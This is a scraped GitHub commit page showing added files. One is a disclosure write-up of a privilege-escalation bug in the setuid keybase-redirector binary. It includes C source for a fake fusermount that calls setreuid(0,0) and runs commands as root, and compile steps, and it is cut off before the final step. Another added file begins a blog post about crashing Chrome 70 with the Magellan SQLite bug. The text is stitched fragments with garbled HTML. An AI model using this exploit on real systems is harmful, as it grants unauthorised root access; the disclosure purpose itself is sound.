You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application to executing a custom fusermount binary as root.
2
+
3
+
## Environment
4
+
5
+
CentOS Linux release 7.4.1708 (Core)
6
+
3.10.0-693.17.1.el7.x86_64
7
+
8
+
RPM info
9
+
10
+
```
11
+
Name : keybase
12
+
Version : 2.8.0.20181017144746.3efc4cbf3c
13
+
Release : 1
14
+
Architecture: x86_64
15
+
Install Date: Mon 22 Oct 2018 05:30:36 PM EDT
16
+
Group : Unspecified
17
+
Size : 273302678
18
+
License : BSD
19
+
Signature : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7
2) Create a custom fusermount application. This PoC will create /w00t as root. Arbitrary commands can be executed.
41
+
42
+
```
43
+
cat >fusermount.c<<EOF
44
+
#include <stdio.h>
45
+
#include <stdlib.h>
46
+
#include <sys/types.h>
47
+
#include <unistd.h>
48
+
49
+
int main(int argc, char **argv)
50
+
{
51
+
setreuid(0,0);
52
+
system("/usr/bin/touch /w00t");
53
+
return(0);
54
+
}
55
+
EOF
56
+
``
57
+
58
+
3) Compile fusermount.c
59
+
60
+
```
61
+
gcc -Wall fusermount.c -o fusermount
62
+
```
63
+
64
+
4) Verify that /w00t does not exist.
65
+
66
+
```
67
+
[user1@localhost woot]$ ls -ld /w00t
68
+
ls: cannot access /w00t: No such file or directory
69
+
```
70
+
71
+
5) Prepend the PATH environment variable with a dot(for current working directory) and execute keybase-redirector which in turn will execute the malicious fusermount binary as root.
title: Crash Chrome 70 with the SQLite Magellan bug
3
+
categories: chrome
4
+
permalink: /sqlitebug/
5
+
layout: post
6
+
---!>
7
+
8
+
<p>This proof-of-concept crashes the Chrome renderer process using <ahref="https://blade.tencent.com/magellan/index_en.html">Tencent Blade Team's Magellan SQLite3 bug</a>. It's based on <ahref="https://www.sqlite.org/src/info/940f2adc8541a838">a SQLite test case</a> from the commit that fixed the bug.</p>
9
+
10
+
<p><spanid="prompttext">If you're using Chrome 70 or below, tap the button below to crash this page:</span></p>
11
+
<buttononClick="crash()" style="font-size: 150%">Crash this page</button>
12
+
<p>Your browser's user agent is: <spanid="browserUserAgent">not available without JavaScript. Turn it on!</span></p>
13
+
14
+
<p><ahref="https://github.com/zhuowei/worthdoingbadly.com/blob/master/_posts/2018-12-14-sqlitebug.html">Source code for this page on GitHub</a>.</p>
15
+
16
+
<h1>Sign up for more information</h1>
17
+
<p>I'm working on understanding how this issue affects browsers. To get notified when I update this page, please sign up to my mailing list:</p>
0 commit comments